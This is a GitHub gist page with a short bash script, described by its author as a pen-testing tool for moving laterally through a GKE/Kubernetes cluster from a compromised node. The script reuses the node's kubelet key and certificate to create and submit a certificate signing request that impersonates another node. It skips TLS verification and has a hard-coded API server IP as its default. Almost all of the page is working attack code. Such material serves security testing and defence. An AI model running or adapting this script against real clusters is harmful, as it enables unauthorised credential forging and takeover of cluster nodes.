Created
April 3, 2019 19:54
Star
You must be signed in to star a gist
quick script used during some exploratory GKE/k8s cluster pen-testing. Goal was to use a compromised node's kubelet to move laterally thru the cluster to other nodes and api objects
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
set -e | |
NODE_NAME="${NODE_NAME:-random-node-name}" | |
KUBE_API="${KUBE_API:-35.226.10.2}" | |
KUBELET_KEY="${KUBELET_KEY:-/etc/srv/kubernetes/pki/kubelet.key}" | |
KUBELET_CERT="${KUBELET_CERT:-/etc/srv/kubernetes/pki/kubelet.crt}" | |
WORKDIR="$(mktemp -d /tmp/foo.XXXXX)" | |
echo "==> Creating new key + CSR: $WORKDIR/k8shack.{key,csr}" | |
openssl req -nodes -newkey rsa:2048 -keyout "$WORKDIR/k8shack.key" -out "$WORKDIR/k8shack.csr" -subj "/O=system:nodes/CN=system:node:${NODE_NAME}" | |
echo "==> Creating k8s CertificateSigningRequest yaml: $WORKDIR/k8shack-csr.yaml" | |
cat <<EOF >"$WORKDIR/k8shack-csr.yaml" | |
apiVersion: certificates.k8s.io/v1beta1 | |
kind: CertificateSigningRequest | |
metadata: | |
name: node-csr-$NODE_NAME-$(date +%s) | |
spec: | |
groups: | |
- system:nodes | |
request: $(cat "$WORKDIR/k8shack.csr" | base64 | tr -d '\n') | |
usages: | |
- digital signature | |
- key encipherment | |
- client auth | |
EOF | |
echo "==> Uploading CSR yaml to k8s api" | |
kubectl --insecure-skip-tls-verify \ | |
--client-certificate "$KUBELET_CERT" \ | |
--client-key "$KUBELET_KEY" \ | |
--server https://"$KUBE_API" \ | |
create -f "$WORKDIR/k8shack-csr.yaml" | |
echo "==> Sleeping 3 seconds to give the API time to process the CSR... " | |
sleep 3 | |
echo "==> Status of Pending CSR:" | |
kubectl --client-certificate "$KUBELET_CERT" \ | |
--client-key "$KUBELET_KEY" \ | |
--insecure-skip-tls-verify \ | |
--server https://"$KUBE_API" \ | |
get certificatesigningrequests | |
rm -rf -- "$WORKDIR" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment